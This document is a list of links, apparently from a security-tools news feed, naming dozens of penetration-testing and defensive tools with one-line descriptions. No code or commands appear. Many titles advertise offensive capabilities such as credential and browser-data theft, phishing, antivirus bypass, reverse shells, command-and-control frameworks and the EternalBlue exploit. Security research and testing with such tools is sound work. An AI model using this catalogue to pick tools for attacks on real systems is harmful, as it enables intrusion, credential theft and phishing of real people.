- [RmiTaste - Allows Security Professionals To Detect, Enumerate, Interact And Exploit RMI Services By Calling Remote Methods With Gadgets From Ysoseria](http://feedproxy.google.com/~r/PentestTools/~3/eHj76Z56HVw/rmitaste-allows-security-professionals.html)
- [Taken - Takeover AWS Ips And Have A Working POC For Subdomain Takeover](http://feedproxy.google.com/~r/PentestTools/~3/bOdrVajU9Ns/taken-takeover-aws-ips-and-have-working.html)
- [Simple-Live-Data-Collection - Simple Live Data Collection Tool](http://feedproxy.google.com/~r/PentestTools/~3/WlQdecUzj3w/simple-live-data-collection-simple-live.html)
- [TheCl0n3r - Tool To Download And Manage Your Git Repositories](http://feedproxy.google.com/~r/PentestTools/~3/EJSjWII-gNQ/thecl0n3r-tool-to-download-and-manage.html)
- [Eagle - Yet Another Vulnerability Scanner](http://feedproxy.google.com/~r/PentestTools/~3/rgibZTcp-HI/eagle-yet-another-vulnerability-scanner.html)
- [HackBrowserData - Decrypt Passwords/Cookies/History/Bookmarks From The Browser](http://feedproxy.google.com/~r/PentestTools/~3/PgoEIWjcmZY/hackbrowserdata-decrypt.html)
- [Mail-Swipe - Script To Create Temporary Email Addresses And Receive Emails](http://feedproxy.google.com/~r/PentestTools/~3/OZ0PzLUJC0Y/mail-swipe-script-to-create-temporary.html)
- [Zracker - Zip File Password BruteForcing Utility Tool based on CPU-Power](http://feedproxy.google.com/~r/PentestTools/~3/JpwWn2_Zbp0/zracker-zip-file-password-bruteforcing.html)
- [Mikrot8Over - Fast Exploitation Tool For Mikrotik RouterOS](http://feedproxy.google.com/~r/PentestTools/~3/aQLOKFbFFkk/mikrot8over-fast-exploitation-tool-for.html)
- [MEDUZA - A More Or Less Universal SSL Unpinning Tool For iOS](http://feedproxy.google.com/~r/PentestTools/~3/2cKyd7r_Vs8/meduza-more-or-less-universal-ssl.html)
- [Nuubi Tools - Information Ghatering, Scanner And Recon](http://feedproxy.google.com/~r/PentestTools/~3/fe4mT_YR5UU/nuubi-tools-information-ghatering.html)
- [DamnVulnerableCryptoApp - An App With Really Insecure Crypto](http://feedproxy.google.com/~r/PentestTools/~3/uWwl058c2EQ/damnvulnerablecryptoapp-app-with-really.html)
- [O365Enum - Enumerate Valid Usernames From Office 365 Using ActiveSync, Autodiscover V1, Or Office.Com Login Page](http://feedproxy.google.com/~r/PentestTools/~3/2PdAA_3kJRQ/o365enum-enumerate-valid-usernames-from.html)
- [Wave-Share - Serverless, Peer-To-Peer, Local File Sharing Through Sound](http://feedproxy.google.com/~r/PentestTools/~3/ICg74ohc_Lk/wave-share-serverless-peer-to-peer.html)
- [Gitjacker - Leak Git Repositories From Misconfigured Websites](http://feedproxy.google.com/~r/PentestTools/~3/9wKv0oGAU6g/gitjacker-leak-git-repositories-from.html)
- [NashaVM - A Virtual Machine For .NET Files And Its Runtime Was Made In C++/CLI](http://feedproxy.google.com/~r/PentestTools/~3/UWFto2G1fkY/nashavm-virtual-machine-for-net-files.html)
- [SwiftBelt - A macOS Enumeration Tool Inspired By Harmjoy'S Windows-based Seatbelt Enumeration Tool](http://feedproxy.google.com/~r/PentestTools/~3/imkt6ka5_MQ/swiftbelt-macos-enumeration-tool.html)
- [C41N - An Automated Rogue Access Point Setup Tool](http://feedproxy.google.com/~r/PentestTools/~3/ePgZCn11yJQ/c41n-automated-rogue-access-point-setup.html)
- [vPrioritizer - Tool To Understand The Contextualized Risk (vPRisk) On Asset-Vulnerability Relationship Level Across The Organization](http://feedproxy.google.com/~r/PentestTools/~3/vOiHE89Lmqw/vprioritizer-tool-to-understand.html)
- [CSRFER - Tool To Generate CSRF Payloads Based On Vulnerable Requests](http://feedproxy.google.com/~r/PentestTools/~3/JsaHZGJDG-I/csrfer-tool-to-generate-csrf-payloads.html)
- [GHunt - Investigate Google Accounts With Emai](http://feedproxy.google.com/~r/PentestTools/~3/G1OHFyV9ZgU/ghunt-investigate-google-accounts-with.html)
- [Offering Users More For Their Activity - Similar Items Upon Checkout](http://feedproxy.google.com/~r/PentestTools/~3/oZv7iE3haj0/offering-users-more-for-their-activity.html)
- [Lockphish - The First Tool For Phishing Attacks On The Lock Screen, Designed To Grab Windows Credentials, Android PIN And iPhone Passcode](http://feedproxy.google.com/~r/PentestTools/~3/Plvy_Rl1lWA/lockphish-first-tool-for-phishing.html)
- [IoTMap - Research Project On Heterogeneous IoT Protocols Modelling](http://feedproxy.google.com/~r/PentestTools/~3/yr7El3AtACY/iotmap-research-project-on.html)
- [Kube-Score - Kubernetes Object Analysis With Recommendations For Improved Reliability And Security](http://feedproxy.google.com/~r/PentestTools/~3/Gghdm3QDnpk/kube-score-kubernetes-object-analysis.html)
- [SCREEN_KILLER - Tool To Track Progress For Reporting (Capture Screenshot, Commands And Outputs) During Pentest Engagement And OSCP](http://feedproxy.google.com/~r/PentestTools/~3/D9AgK5L-TsE/screenkiller-tool-to-track-progress-for.html)
- [OFFPORT_KILLER - This Tool Aims At Automating The Identification Of Potential Service Running Behind Ports Identified Manually Either Through Manual Scan Or Services Running Locally](http://feedproxy.google.com/~r/PentestTools/~3/78ROR5zW6pI/offportkiller-this-tool-aims-at.html)
- [AdvPhishing - This Is Advance Phishing Tool! OTP PHISHING](http://feedproxy.google.com/~r/PentestTools/~3/9rL0P-wabG0/advphishing-this-is-advance-phishing.html)
- [Timewarrior - Commandline Time Reporting](http://feedproxy.google.com/~r/PentestTools/~3/535wqOfUx-Y/timewarrior-commandline-time-reporting.html)
- [Asnap - Tool To Render Recon Phase Easier By Providing Updated Data About Which Companies Owns Which Ipv4 Or Ipv6 Addresses](http://feedproxy.google.com/~r/PentestTools/~3/VOKUQlUfTOk/asnap-tool-to-render-recon-phase-easier.html)
- [uriDeep - Unicode Encoding Attacks With Machine Learning](http://feedproxy.google.com/~r/PentestTools/~3/3x4bVKUd5GY/urideep-unicode-encoding-attacks-with.html)
- [smbAutoRelay - Provides The Automation Of SMB/NTLM Relay Technique For Pentesting And Red Teaming Exercises In Active Directory Environments](http://feedproxy.google.com/~r/PentestTools/~3/NvW7RawQDkE/smbautorelay-provides-automation-of.html)
- [Powerglot - Encodes Offensive Powershell Scripts Using Polyglots](http://feedproxy.google.com/~r/PentestTools/~3/zv31f0xkA7c/powerglot-encodes-offensive-powershell.html)
- [Pastego - Scrape/Parse Pastebin Using GO And Expression Grammar (PEG)](http://feedproxy.google.com/~r/PentestTools/~3/ggJCpOTjD6A/pastego-scrapeparse-pastebin-using-go.html)
- [H2Csmuggler - HTTP Request Smuggling Over HTTP/2 Cleartext (H2C)](http://feedproxy.google.com/~r/PentestTools/~3/hb3EVb84Wm4/h2csmuggler-http-request-smuggling-over.html)
- [mapCIDR - Small Utility Program To Perform Multiple Operations For A Given subnet/CIDR Ranges](http://feedproxy.google.com/~r/PentestTools/~3/6x_E2MWbBXg/mapcidr-small-utility-program-to.html)
- [Lil-Pwny - Auditing Active Directory Passwords Using Multiprocessing In Python](http://feedproxy.google.com/~r/PentestTools/~3/9RJQyVtuRiQ/lil-pwny-auditing-active-directory.html)
- [Polypyus - Learns To Locate Functions In Raw Binaries By Extracting Known Functions From Similar Binaries](http://feedproxy.google.com/~r/PentestTools/~3/ZpledTN5EgI/polypyus-learns-to-locate-functions-in.html)
- [NERVE - Network Exploitation, Reconnaissance & Vulnerability Engine](http://feedproxy.google.com/~r/PentestTools/~3/6AyTn1gInq8/nerve-network-exploitation.html)
- [Cooolis-ms - A Server That Supports The Metasploit Framework RPC](http://feedproxy.google.com/~r/PentestTools/~3/_qWg7ZFvgwQ/cooolis-ms-server-that-supports.html)
- [PwnedPasswordsChecker - Search (Offline) If Your Password (NTLM Or SHA1 Format) Has Been Leaked (HIBP Passwords List V5)](http://feedproxy.google.com/~r/PentestTools/~3/HtE1DiO8-PE/pwnedpasswordschecker-search-offline-if.html)
- [Wacker - A WPA3 Dictionary Cracker](http://feedproxy.google.com/~r/PentestTools/~3/aS1cYBb7044/wacker-wpa3-dictionary-cracker.html)
- [SharpSecDump - .Net Port Of The Remote SAM + LSA Secrets Dumping Functionality Of Impacket'S Secretsdump.Py](http://feedproxy.google.com/~r/PentestTools/~3/8RalQfAQVAM/sharpsecdump-net-port-of-remote-sam-lsa.html)
- [Velociraptor - Endpoint Visibility and Collection Tool](http://feedproxy.google.com/~r/PentestTools/~3/v-j8yyHjAqc/velociraptor-endpoint-visibility-and.html)
- [Go-Dork - The Fastest Dork Scanner Written In Go](http://feedproxy.google.com/~r/PentestTools/~3/T_DF1kVlo9M/go-dork-fastest-dork-scanner-written-in.html)
- [PwnXSS - Vulnerability XSS Scanner Exploit](http://feedproxy.google.com/~r/PentestTools/~3/hswp4VMm-Ps/pwnxss-vulnerability-xss-scanner-exploit.html)
- [PSMDATP - PowerShell Module For Managing Microsoft Defender Advanced Threat Protection](http://feedproxy.google.com/~r/PentestTools/~3/QJIT_UrXx2E/psmdatp-powershell-module-for-managing.html)
- [SitRep - Extensible, Configurable Host Triage](http://feedproxy.google.com/~r/PentestTools/~3/R0IorqSgqBs/sitrep-extensible-configurable-host.html)
- [Enum4Linux - A Linux Alternative To Enum.Exe For Enumerating Data From Windows And Samba Hosts](http://feedproxy.google.com/~r/PentestTools/~3/sZ0NLoU2pmo/enum4linux-linux-alternative-to-enumexe.html)
- [Dnxfirewall - A Pure Python Next Generation Firewall Built On Top Of Linux Kernel/Netfilter](http://feedproxy.google.com/~r/PentestTools/~3/_yxvJMSwP00/dnxfirewall-pure-python-next-generation.html)
- [FLUFFI (Fully Localized Utility For Fuzzing Instantaneously) - A Distributed Evolutionary Binary Fuzzer For Pentesters](http://feedproxy.google.com/~r/PentestTools/~3/7WMHthvZGOI/fluffi-fully-localized-utility-for.html)
- [GRAT2 - Command And Control (C2) Project For Learning Purpose](http://feedproxy.google.com/~r/PentestTools/~3/KOYEmYSRMu4/grat2-command-and-control-c2-project.html)
- [VMPDump - A Dynamic VMP Dumper And Import Fixer](http://feedproxy.google.com/~r/PentestTools/~3/VVtDDKnnz_Y/vmpdump-dynamic-vmp-dumper-and-import.html)
- [Moriarty-Project - This Tool Gives Information About The Phone Number That You Entered](http://feedproxy.google.com/~r/PentestTools/~3/Yyz2jRMghaM/moriarty-project-this-tool-gives.html)
- [Frp - A Fast Reverse Proxy To Help You Expose A Local Server Behind A NAT Or Firewall To The Internet](http://feedproxy.google.com/~r/PentestTools/~3/GjMMOE5tJPs/frp-fast-reverse-proxy-to-help-you.html)
- [CRLFuzz - A Fast Tool To Scan CRLF Vulnerability Written In Go](http://feedproxy.google.com/~r/PentestTools/~3/mIMcLEdEO-Y/crlfuzz-fast-tool-to-scan-crlf.html)
- [Winshark - A Wireshark Plugin To Instrument ETW](http://feedproxy.google.com/~r/PentestTools/~3/vcNH3laXgsg/winshark-wireshark-plugin-to-instrument.html)
- [Winshark - A Wireshark Plugin To Instrument ETW](http://feedproxy.google.com/~r/PentestTools/~3/vcNH3laXgsg/winshark-wireshark-plugin-to-instrument.html)
- [Unimap - Scan Only Once By IP Address And Reduce Scan Times With Nmap For Large Amounts Of Data](http://feedproxy.google.com/~r/PentestTools/~3/u67qPTejFCk/unimap-scan-only-once-by-ip-address-and.html)
- [Bxss - A Blind XSS Injector Tool](http://feedproxy.google.com/~r/PentestTools/~3/N6OJ502fYVg/bxss-blind-xss-injector-tool.html)
- [CRLFMap - A Tool To Find HTTP Splitting Vulnerabilities](http://feedproxy.google.com/~r/PentestTools/~3/fh8M4QNEvEU/crlfmap-tool-to-find-http-splitting.html)
- [Zin - A Payload Injector For Bugbounties Written In Go](http://feedproxy.google.com/~r/PentestTools/~3/keMyIdRISpM/zin-payload-injector-for-bugbounties.html)
- [dorkX - Pipe Different Tools With Google Dork Scanner](http://feedproxy.google.com/~r/PentestTools/~3/D9zzXBsdBjk/dorkx-pipe-different-tools-with-google.html)
- [AES Finder - Utility To Find AES Keys In Running Processes](http://feedproxy.google.com/~r/PentestTools/~3/GypI0kZbP-g/aes-finder-utility-to-find-aes-keys-in.html)
- [Croc - Easily And Securely Send Things From One Computer To Another](http://feedproxy.google.com/~r/PentestTools/~3/1gIIPgDlbQc/croc-easily-and-securely-send-things.html)
- [ActiveDirectoryEnumeration - Enumerate AD Through LDAP With A Collection Of Helpfull Scripts Being Bundled](http://feedproxy.google.com/~r/PentestTools/~3/qGafaDMGWj4/activedirectoryenumeration-enumerate-ad.html)
- [Rbcd-Attack - Kerberos Resource-Based Constrained Delegation Attack From Outside Using Impacket](http://feedproxy.google.com/~r/PentestTools/~3/LzzH-LC3i2Q/rbcd-attack-kerberos-resource-based.html)
- [WMIHACKER - A Bypass Anti-virus Software Lateral Movement Command Execution Tool](http://feedproxy.google.com/~r/PentestTools/~3/dkRbV_ANAKk/wmihacker-bypass-anti-virus-software.html)
- [Chimera - PowerShell Obfuscation Script Designed To Bypass AMSI And Commercial Antivirus Solutions](http://feedproxy.google.com/~r/PentestTools/~3/fXwvO9lv8QE/chimera-powershell-obfuscation-script.html)
- [DockerENT - The Only Open-Source Tool To Analyze Vulnerabilities And Configuration Issues With Running Docker Container(S) And Docker Networks](http://feedproxy.google.com/~r/PentestTools/~3/zW0JbQLn_9o/dockerent-only-open-source-tool-to.html)
- [HTTP-revshell - Powershell Reverse Shell Using HTTP/S Protocol With AMSI Bypass And Proxy Aware](http://feedproxy.google.com/~r/PentestTools/~3/DP6tdbTO9BQ/http-revshell-powershell-reverse-shell.html)
- [Some-Tools - Install And Keep Up To Date Some Pentesting Tools](http://feedproxy.google.com/~r/PentestTools/~3/rFMLhmsD1H8/some-tools-install-and-keep-up-to-date.html)
- [MZAP - Multiple Target ZAP Scanning](http://feedproxy.google.com/~r/PentestTools/~3/9avRYndlq40/mzap-multiple-target-zap-scanning.html)
- [Monsoon - Fast HTTP Enumerator](http://feedproxy.google.com/~r/PentestTools/~3/l_jCm0lhjM8/monsoon-fast-http-enumerator.html)
- [Avcleaner - C/C++ Source Obfuscator For Antivirus Bypass](http://feedproxy.google.com/~r/PentestTools/~3/EUqib9t1FN8/avcleaner-cc-source-obfuscator-for.html)
- [Spyre - Simple YARA-based IOC Scanner](http://feedproxy.google.com/~r/PentestTools/~3/FuSa2QH-Ojw/spyre-simple-yara-based-ioc-scanner.html)
- [Safety - Check Your Installed Dependencies For Known Security Vulnerabilities](http://feedproxy.google.com/~r/PentestTools/~3/rdmRMSunj-A/safety-check-your-installed.html)
- [Anchore Engine - A Service That Analyzes Docker Images And Applies User-Defined Acceptance Policies To Allow Automated Container Image Validation And Certification](http://feedproxy.google.com/~r/PentestTools/~3/Ll18a8n6Jxg/anchore-engine-service-that-analyzes.html)
- [Rakkess - Kubectl Plugin To Show An Access Matrix For K8S Server Resources](http://feedproxy.google.com/~r/PentestTools/~3/2Hkk371VZJs/rakkess-kubectl-plugin-to-show-access.html)
- [Browsertunnel - Surreptitiously Exfiltrate Data From The Browser Over DNS](http://feedproxy.google.com/~r/PentestTools/~3/yBy34eM1n_Y/browsertunnel-surreptitiously.html)
- [Bpytop - Linux/OSX/FreeBSD Resource Monitor](http://feedproxy.google.com/~r/PentestTools/~3/WN3AZqWDWYA/bpytop-linuxosxfreebsd-resource-monitor.html)
- [PurpleCloud - An Infrastructure As Code (IaC) Deployment Of A Small Active Directory Pentest Lab In The Cloud](http://feedproxy.google.com/~r/PentestTools/~3/CAxjGNhM4x0/purplecloud-infrastructure-as-code-iac.html)
- [OpenRedireX - Asynchronous Open redirect Fuzzer for Humans](http://feedproxy.google.com/~r/PentestTools/~3/0xfmn6oB8-Q/openredirex-asynchronous-open-redirect.html)
- [SQLMap v1.4.9 - Automatic SQL Injection And Database Takeover Tool](http://feedproxy.google.com/~r/PentestTools/~3/dWU4PwMV2eM/sqlmap-v149-automatic-sql-injection-and.html)
- [Autovpn - Create On Demand Disposable OpenVPN Endpoints On AWS](http://feedproxy.google.com/~r/PentestTools/~3/lxGVU3oWwCE/autovpn-create-on-demand-disposable.html)
- [VPS-Docker-For-Pentest - Create A VPS On Google Cloud Platform Or Digital Ocean Easily With The Docker For Pentest](http://feedproxy.google.com/~r/PentestTools/~3/IdBMpDV2-YE/vps-docker-for-pentest-create-vps-on.html)
- [Hardcodes - Find Hardcoded Strings From Source Code](http://feedproxy.google.com/~r/PentestTools/~3/YRv0CYJQebY/hardcodes-find-hardcoded-strings-from.html)
- [Wordlist_Generator - Unique Wordlist Generator Of Unique Wordlists](http://feedproxy.google.com/~r/PentestTools/~3/7KJG42Tdj8E/wordlistgenerator-unique-wordlist.html)
- [Faraday v3.12 - Collaborative Penetration Test and Vulnerability Management Platform](http://feedproxy.google.com/~r/PentestTools/~3/u3YkDNeo6eM/faraday-v312-collaborative-penetration.html)
- [H4Rpy - Automated WPA/WPA2 PSK Attack Tool](http://feedproxy.google.com/~r/PentestTools/~3/lJgSSlMa3DE/h4rpy-automated-wpawpa2-psk-attack-tool.html)
- [SNIcat - Server Name Indication Concatenator](http://feedproxy.google.com/~r/PentestTools/~3/xUcBOGG3Tco/snicat-server-name-indication.html)
- [Geo-Recon - An OSINT CLI Tool Desgined To Fast Track IP Reputation And Geo-locaton Look Up For Security Analysts](http://feedproxy.google.com/~r/PentestTools/~3/Nvsl-cXK6Qk/geo-recon-osint-cli-tool-desgined-to.html)
- [Bbrecon - Python Library And CLI For The Bug Bounty Recon API](http://feedproxy.google.com/~r/PentestTools/~3/ctp2uR7Xquc/bbrecon-python-library-and-cli-for-bug.html)
- [SpaceSiren - A Honey Token Manager And Alert System For AWS](http://feedproxy.google.com/~r/PentestTools/~3/SIBlEXl2Mhc/spacesiren-honey-token-manager-and.html)
- [LOLBITS v2.0.0 - C2 Framework That Uses Background Intelligent Transfer Service (BITS) As Communication Protocol And Direct Syscalls + Dinvoke For EDR User-Mode Hooking Evasion](http://feedproxy.google.com/~r/PentestTools/~3/R2WwQr8F47Q/lolbits-v200-c2-framework-that-uses.html)
- [Killchain - A Unified Console To Perform The "Kill Chain" Stages Of Attacks](http://feedproxy.google.com/~r/PentestTools/~3/GUfD7UUO73M/killchain-unified-console-to-perform.html)
- [CrossC2 - Generate CobaltStrike's Cross-Platform Payload](http://feedproxy.google.com/~r/PentestTools/~3/62-5E9fU0nY/crossc2-generate-cobaltstrikes-cross.html)
- [DVS - D(COM) V(ulnerability) S(canner) AKA Devious Swiss Army Knife](http://feedproxy.google.com/~r/PentestTools/~3/-CgfAXeYBbQ/dvs-dcom-vulnerability-scanner-aka.html)
- [Mihari - A Helper To Run OSINT Queries & Manage Results Continuously](http://feedproxy.google.com/~r/PentestTools/~3/oD9c2Ho-HpE/mihari-helper-to-run-osint-queries.html)
- [SourceWolf - Amazingly Fast Response Crawler To Find Juicy Stuff In The Source Code!](http://feedproxy.google.com/~r/PentestTools/~3/vnQIoGUz_aI/sourcewolf-amazingly-fast-response.html)
- [Iblessing - An iOS Security Exploiting Toolkit, It Mainly Includes Application Information Collection, Static Analysis And Dynamic Analysis](http://feedproxy.google.com/~r/PentestTools/~3/Q3c4cB_8CVc/iblessing-ios-security-exploiting.html)
- [Urlgrab - A Golang Utility To Spider Through A Website Searching For Additional Links](http://feedproxy.google.com/~r/PentestTools/~3/o26F28QBGHY/urlgrab-golang-utility-to-spider.html)
- [Osintgram - A OSINT Tool On Instagram](http://feedproxy.google.com/~r/PentestTools/~3/stdKgt-1gJI/osintgram-osint-tool-on-instagram.html)
- [Vulnerable-AD - Create A Vulnerable Active Directory That'S Allowing You To Test Most Of Active Directory Attacks In Local Lab](http://feedproxy.google.com/~r/PentestTools/~3/d758Ikb_OAA/vulnerable-ad-create-vulnerable-active.html)
- [Bluescan - A Powerful Bluetooth Scanner For Scanning BR/LE Devices, LMP, SDP, GATT And Vulnerabilities!](http://feedproxy.google.com/~r/PentestTools/~3/g1Yto8yeP_4/bluescan-powerful-bluetooth-scanner-for.html)
- [SharpHose - Asynchronous Password Spraying Tool In C# For Windows Environments](http://feedproxy.google.com/~r/PentestTools/~3/M0P9g3OrLBs/sharphose-asynchronous-password.html)
- [Bashtop - Linux/OSX/FreeBSD Resource Monitor](http://feedproxy.google.com/~r/PentestTools/~3/-T0Iaw7N6oc/bashtop-linuxosxfreebsd-resource-monitor.html)
- [Hack-Tools - The All-In-One Red Team Extension For Web Pentester](http://feedproxy.google.com/~r/PentestTools/~3/40sICXRd1WM/hack-tools-all-in-one-red-team.html)
- [ezEmu - Simple Execution Of Commands For Defensive Tuning/Research](http://feedproxy.google.com/~r/PentestTools/~3/l30aPVgljY0/ezemu-simple-execution-of-commands-for.html)
- [VolExp - Volatility Explorer](http://feedproxy.google.com/~r/PentestTools/~3/c0O_S9gtClw/volexp-volatility-explorer.html)
- [AWS Recon - Multi-threaded AWS Inventory Collection Tool With A Focus On Security-Relevant Resources And Metadata](http://feedproxy.google.com/~r/PentestTools/~3/mCRMljaSu2w/aws-recon-multi-threaded-aws-inventory.html)
- [Yeti - Your Everyday Threat Intelligence](http://feedproxy.google.com/~r/PentestTools/~3/i2mVG7ADgJY/yeti-your-everyday-threat-intelligence.html)
- [Parth - Heuristic Vulnerable Parameter Scanner](http://feedproxy.google.com/~r/PentestTools/~3/m4wLETpWmGk/parth-heuristic-vulnerable-parameter.html)
- [Pyre-Check - Performant Type-Checking For Python](http://feedproxy.google.com/~r/PentestTools/~3/11ghEtFIPr8/pyre-check-performant-type-checking-for.html)
- [Intel Owl - Analyze Files, Domains, IPs In Multiple Ways From A Single API At Scale](http://feedproxy.google.com/~r/PentestTools/~3/tv-NcoUlPpE/intel-owl-analyze-files-domains-ips-in.html)
- [Scan-For-Webcams - Scan For Webcams In The Internet](http://feedproxy.google.com/~r/PentestTools/~3/soTAChdKCy8/scan-for-webcams-scan-for-webcams-in.html)
- [Cloud-Sniper - Virtual Security Operations Center](http://feedproxy.google.com/~r/PentestTools/~3/lvLipNAsBCA/cloud-sniper-virtual-security.html)
- [SecGen - Create Randomly Insecure VMs](http://feedproxy.google.com/~r/PentestTools/~3/vwgVktVQxiE/secgen-create-randomly-insecure-vms.html)
- [ADBSploit - A Python Based Tool For Exploiting And Managing Android Devices Via ADB](http://feedproxy.google.com/~r/PentestTools/~3/aWZQxx87ZOQ/adbsploit-python-based-tool-for.html)
- [Wonitor - Fast, Zero Config Web Endpoint Change Monitor](http://feedproxy.google.com/~r/PentestTools/~3/lHbLtwhkOOs/wonitor-fast-zero-config-web-endpoint.html)
- [DropEngine - Malleable Payloads!](http://feedproxy.google.com/~r/PentestTools/~3/CviZ5LqxLXQ/dropengine-malleable-payloads.html)
- [ReconSpider - Most Advanced Open Source Intelligence (OSINT) Framework For Scanning IP Address, Emails, Websites, Organizations](http://feedproxy.google.com/~r/PentestTools/~3/2Y14ewQJS1Q/reconspider-most-advanced-open-source.html)
- [Pagodo - Automate Google Hacking Database Scraping And Searching](http://feedproxy.google.com/~r/PentestTools/~3/M07zJ17Oieo/pagodo-automate-google-hacking-database.html)
- [Kali Linux 2020.3 Release - Penetration Testing and Ethical Hacking Linux Distribution](http://feedproxy.google.com/~r/PentestTools/~3/zC4oYkLKLdY/kali-linux-20203-release-penetration.html)
- [PurpleSharp - C# Adversary Simulation Tool That Executes Adversary Techniques With The Purpose Of Generating Attack Telemetry In Monitored Windows Environments](http://feedproxy.google.com/~r/PentestTools/~3/IzAVJtYAZHU/purplesharp-c-adversary-simulation-tool.html)
- [Sinter - A User-Mode Application Authorization System For MacOS Written In Swift](http://feedproxy.google.com/~r/PentestTools/~3/8Kt4XvbKfF0/sinter-user-mode-application.html)
- [IoT-PT - A Virtual Environment For Pentesting IoT Devices](http://feedproxy.google.com/~r/PentestTools/~3/xI86e6AIgtE/iot-pt-virtual-environment-for.html)
- [Urlbuster - Powerful Mutable Web Directory Fuzzer To Bruteforce Existing And/Or Hidden Files Or Directories](http://feedproxy.google.com/~r/PentestTools/~3/nLo8IxobO1A/urlbuster-powerful-mutable-web.html)
- [PowerSharpPack - Many usefull offensive CSharp Projects wraped into Powershell for easy usage](http://feedproxy.google.com/~r/PentestTools/~3/tu7RPbSD32c/powersharppack-many-usefull-offensive.html)
- [Spybrowse - Code Developed To Steal Certain Browser Config Files (History, Preferences, Etc)](http://feedproxy.google.com/~r/PentestTools/~3/16nx030JA64/spybrowse-code-developed-to-steal.html)
- [CheckXSS - Detect XSS vulnerability in Web Applications](http://feedproxy.google.com/~r/PentestTools/~3/hYN1k2fAie4/checkxss-detect-xss-vulnerability-in.html)
- [Phirautee - A PoC Crypto Virus To Spread User Awareness About Attacks And Implications Of Ransomwares](http://feedproxy.google.com/~r/PentestTools/~3/Z6nqxV78cEQ/phirautee-poc-crypto-virus-to-spread.html)
- [Unfollow-Plus - Automated Instagram Unfollower Bot](http://feedproxy.google.com/~r/PentestTools/~3/V_Pju0doVxo/unfollow-plus-automated-instagram.html)
- [DAGOBAH - Open Source Tool To Generate Internal Threat Intelligence, Inventory & Compliance Data From AWS Resources](http://feedproxy.google.com/~r/PentestTools/~3/heCluXrDIA0/dagobah-open-source-tool-to-generate.html)
- [AWS Report - A Tool For Analyzing Amazon Resources](http://feedproxy.google.com/~r/PentestTools/~3/pKUBrpmSvbE/aws-report-tool-for-analyzing-amazon.html)
- [AWS Report - A Tool For Analyzing Amazon Resources.](http://feedproxy.google.com/~r/PentestTools/~3/pKUBrpmSvbE/aws-report-tool-for-analyzing-amazon.html)
- [Bastillion - A Web-Based SSH Console That Centrally Manages Administrative Access To Systems](http://feedproxy.google.com/~r/PentestTools/~3/nyadoE_TPlE/bastillion-web-based-ssh-console-that.html)
- [Nautilus - A Grammar Based Feedback Fuzzer](http://feedproxy.google.com/~r/PentestTools/~3/8Xdw3mHfTWc/nautilus-grammar-based-feedback-fuzzer.html)
- [SharpChromium - .NET 4.0 CLR Project To Retrieve Chromium Data, Such As Cookies, History And Saved Logins](http://feedproxy.google.com/~r/PentestTools/~3/uhBB_ctbUKk/sharpchromium-net-40-clr-project-to.html)
- [SkyArk - Helps To Discover, Assess And Secure The Most Privileged Entities In Azure And AWS](http://feedproxy.google.com/~r/PentestTools/~3/fA1njXZatyo/skyark-helps-to-discover-assess-and.html)
- [PE Tree - Python Module For Viewing Portable Executable (PE) Files In A Tree-View](http://feedproxy.google.com/~r/PentestTools/~3/tRB-G7g7FNw/pe-tree-python-module-for-viewing.html)
- [Flask-Session-Cookie-Manager - Flask Session Cookie Decoder/Encoder](http://feedproxy.google.com/~r/PentestTools/~3/RCa4AMavP_4/flask-session-cookie-manager-flask.html)
- [Arcane - A Simple Script Designed To Backdoor iOS Packages (Iphone-Arm) And Create The Necessary Resources For APT Repositories](http://feedproxy.google.com/~r/PentestTools/~3/6dNxma-yOxI/arcane-simple-script-designed-to.html)
- [IRFuzz - Simple Scanner with Yara Rule](http://feedproxy.google.com/~r/PentestTools/~3/dAGy8qxNrf4/irfuzz-simple-scanner-with-yara-rule.html)
- [Evine - Interactive CLI Web Crawler](http://feedproxy.google.com/~r/PentestTools/~3/msGReDRfM18/evine-interactive-cli-web-crawler.html)
- [SharpAppLocker - C# Port Of The Get-AppLockerPolicy PS Cmdlet](http://feedproxy.google.com/~r/PentestTools/~3/r3EqsmFsAyk/sharpapplocker-c-port-of-get.html)
- [PhishingKitTracker - Let's Track Phishing Kits To Give To Research Community Raw Material To Stud](http://feedproxy.google.com/~r/PentestTools/~3/tYI46yw5MEg/phishingkittracker-lets-track-phishing.html)
- [FestIn - S3 Bucket Weakness Discovery](http://feedproxy.google.com/~r/PentestTools/~3/IsCkuOcHH-s/festin-s3-bucket-weakness-discovery.html)
- [Chalumeau - Automated, Extendable And Customizable Credential Dumping Tool](http://feedproxy.google.com/~r/PentestTools/~3/n5PhxTEkoD0/chalumeau-automated-extendable-and.html)
- [Gtunnel - A Robust Tunelling Solution Written In Golang](http://feedproxy.google.com/~r/PentestTools/~3/rJJ0YBAATJ8/gtunnel-robust-tunelling-solution.html)
- [Taowu - A CobaltStrike Toolkit](http://feedproxy.google.com/~r/PentestTools/~3/FoviBkgs9Wk/taowu-cobaltstrike-toolkit.html)
- [UEFI_RETool - A Tool For UEFI Firmware Reverse Engineering](http://feedproxy.google.com/~r/PentestTools/~3/jJswEzISv-A/uefiretool-tool-for-uefi-firmware.html)
- [Netenum - A Tool To Passively Discover Active Hosts On A Network](http://feedproxy.google.com/~r/PentestTools/~3/HSBbC7UuzVs/netenum-tool-to-passively-discover.html)
- [DLInjector-GUI - DLL Injector Graphical User Interface](http://feedproxy.google.com/~r/PentestTools/~3/_kClm9oJJUM/dlinjector-gui-dll-injector-graphical.html)
- [Xeca - PowerShell Payload Generator](http://feedproxy.google.com/~r/PentestTools/~3/xsbLQOGTFuA/xeca-powershell-payload-generator.html)
- [Cnitch - Container Snitch Checks Running Processes Under The Docker Engine And Alerts If Any Are Found To Be Running As Root](http://feedproxy.google.com/~r/PentestTools/~3/6FGeYMW_2E0/cnitch-container-snitch-checks-running.html)
- [Mistica - An Open Source Swiss Army Knife For Arbitrary Communication Over Application Protocols](http://feedproxy.google.com/~r/PentestTools/~3/3rKmWTT6gLw/mistica-open-source-swiss-army-knife.html)
- [DeimosC2 - A Golang Command And Control Framework For Post-Exploitation](http://feedproxy.google.com/~r/PentestTools/~3/TLSuJyOoAGg/deimosc2-golang-command-and-control.html)
- [EternalBlueC - EternalBlue Suite Remade In C/C++ Which Includes: MS17-010 Exploit, EternalBlue Vulnerability Detector, DoublePulsar Detector And DoublePulsar Shellcode & DLL Uploader](http://feedproxy.google.com/~r/PentestTools/~3/YshWuG7n0_s/eternalbluec-eternalblue-suite-remade.html)
- [CWFF - Create Your Custom Wordlist For Fuzzing](http://feedproxy.google.com/~r/PentestTools/~3/bTZRr6ehdsY/cwff-create-your-custom-wordlist-for.html)
